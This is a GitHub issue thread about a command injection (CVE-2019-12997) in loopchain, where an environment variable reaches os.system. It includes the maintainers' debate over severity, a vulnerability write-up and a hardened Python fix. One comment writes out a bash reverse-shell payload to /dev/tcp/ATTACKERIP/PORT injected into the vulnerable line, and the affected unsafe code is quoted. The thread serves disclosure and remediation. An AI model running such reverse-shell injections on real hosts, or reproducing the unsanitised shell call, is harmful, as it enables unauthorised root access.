Command Injection (Privilege Escalation) #231
Comments
You mean an attacker having access to environment variables is also able to inject commands in its own loopchain node?

Hi, thanks for your reply. I totally agree with you, but I did not mean remotely. What I meant was that an attacker can escalate privileges from a low-privilege shell by changing the environment (injection in an environment variable).
- remove legacy score configurations, useless code - fix command injection issue (#231)
I created a PR that fixes this issue.

Thank you. Am I still eligible for a bounty, please?

You may need to apply to the ICONLOOP Bug Bounty program if you want to raise awareness about the vulnerability you found, and let the people responsible for the bug bounty program evaluate the vulnerability reward: https://hackerone.com/iconloop_inc
I don't think this is critical, because the attacker first needs to gain access to the host where the loopchain is running. Furthermore, loopchain itself doesn't need any special privileges to run, so there is nothing the attacker could get from such an attack.

A hacker can escalate their privileges to root after gaining a low-privilege shell. So it is a privilege escalation vulnerability; thanks anyway for listening.
A CVE was assigned, but unfortunately hackerone/your company refuses to pay the bounty. However, my objective as a Security Researcher has been fulfilled; thank you for patching this vulnerability. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12997

Could you provide us detailed steps to reproduce such an exploit in a loopchain environment to acquire a root shell from your exploit, please? As sink772 mentioned, the loopchain engine doesn't need to run with any special privileges. So classifying this vulnerability as a privesc to root doesn't sound correct with the current vulnerability you've pointed out. Thanks for the vulnerability report and for the fix; let's classify it correctly and remain factual.
So if you look at this line of code:

    os.system("ssh-keyscan "+os.getenv('DEFAULT_SCORE_HOST')+" >> /root/.ssh/known_hosts")

This command will need root privileges to run as it's trying to append/write something to /root/.ssh/known_hosts. (Anything that writes to the root directory needs root privilege.) Let's say an attacker gets a low-privilege shell where loopchain is installed. The attacker now wants to escalate privileges to root, so he/she will inject a bash reverse shell inside the DEFAULT_SCORE_HOST environment variable; then whenever that line of code runs, it will send a reverse shell with root privileges to the attacker. Simple but effective. The line of code would then look like this:

    os.system("ssh-keyscan "+ ;bash -i >& /dev/tcp/ATTACKERIP/PORT 0>&1;+" >> /root/.ssh/known_hosts")

As you can see, the semi-colons terminated the irrelevant queries so only the attacker's code gets executed in bash. Now this command will have to be run as root as it's writing to the /root/ directory. Try and understand the concept please.

I'm having no issue understanding the concept, but thanks for the explanation :)
No, that's not what happens in a normal scenario. Anyway, this is indeed a command injection from legacy code, and it deserved to be reported, so thanks for that.

Description:
Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
Details:
An attacker can manipulate DEFAULT_SCORE_HOST, which is trusted user-supplied input; this can be used to inject commands and gain arbitrary code execution.
Affected URL:
https://github.com/icon-project/loopchain/blob/2ab4734138d6a2a480a08ee023b2f4d74679ed43/loopchain/__main__.py
Affected Code:
    if os.getenv('DEFAULT_SCORE_HOST') is not None:
        os.system("ssh-keyscan "+os.getenv('DEFAULT_SCORE_HOST')+" >> /root/.ssh/known_hosts")

Reference:
https://www.owasp.org/index.php/Command_Injection
Example/PoC:
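As an added example (not loopchain's code, not the fix PR, and not the reporter's PoC), this is the hardened counterpart of the affected line: the value taken from the environment is checked against a strict hostname/IP allow-list, ssh-keyscan is invoked through an argv list so no shell ever parses the value, and the result is appended to the invoking user's own known_hosts rather than /root. The function names, the hostname regex and the sample inputs in the test are this example's own assumptions.

```python
"""Hardened replacement for the pattern
    os.system("ssh-keyscan " + os.getenv('DEFAULT_SCORE_HOST') + " >> /root/.ssh/known_hosts")
Added example; the helper names below are assumptions, not loopchain's API."""
from __future__ import annotations

import ipaddress
import os
import re
import subprocess
from pathlib import Path
from typing import Mapping, Optional

# RFC 1123 hostname labels: letters, digits, hyphens; no leading/trailing hyphen;
# dots only between labels. Anything else (spaces, ';', '$', '>', quotes) fails.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def is_safe_host(value: str) -> bool:
    """Allow-list check: True only for a plain hostname or an IP literal."""
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)  # IPv4 or IPv6 literal
        return True
    except ValueError:
        pass
    return _HOSTNAME_RE.fullmatch(value) is not None


def build_keyscan_argv(host: str, port: Optional[int] = None) -> list:
    """Build the argv for ssh-keyscan. Rejects untrusted values with ValueError
    instead of letting them reach a shell; the list form means no shell is used."""
    if not is_safe_host(host):
        raise ValueError(f"refusing to keyscan untrusted host value: {host!r}")
    argv = ["ssh-keyscan"]
    if port is not None:
        if not 1 <= port <= 65535:
            raise ValueError(f"invalid port: {port}")
        argv += ["-p", str(port)]
    argv.append(host)
    return argv


def keyscan_argv_from_env(var: str = "DEFAULT_SCORE_HOST",
                          env: Optional[Mapping[str, str]] = None) -> Optional[list]:
    """Mirror of the original guard: None when the variable is unset, otherwise the
    validated argv that would be executed. `env` defaults to os.environ."""
    source = os.environ if env is None else env
    value = source.get(var)
    if value is None:
        return None
    return build_keyscan_argv(value)


def append_known_hosts(host: str, known_hosts: Optional[Path] = None) -> int:
    """Run ssh-keyscan without a shell and append its key lines to the calling
    user's known_hosts (never a hard-coded /root path). Returns lines appended."""
    if known_hosts is None:
        known_hosts = Path.home() / ".ssh" / "known_hosts"
    argv = build_keyscan_argv(host)
    result = subprocess.run(argv, capture_output=True, text=True, check=False)
    lines = [ln for ln in result.stdout.splitlines() if ln and not ln.startswith("#")]
    known_hosts.parent.mkdir(parents=True, exist_ok=True)
    with open(known_hosts, "a", encoding="utf-8") as fh:
        for ln in lines:
            fh.write(ln + "\n")
    return len(lines)


if __name__ == "__main__":
    # Constructed sample values: one acceptable host and one injection-shaped value.
    for candidate in ("example.com", "host; id"):
        try:
            print(build_keyscan_argv(candidate))
        except ValueError as exc:
            print("rejected:", exc)
```

The important design choice is that validation and the argv list are independent defences: even if the regex were loosened, `subprocess.run` with a list never hands the value to `/bin/sh`, so shell metacharacters carry no meaning. Writing to the caller's own known_hosts also removes the reason the original line had to run as root in the first place.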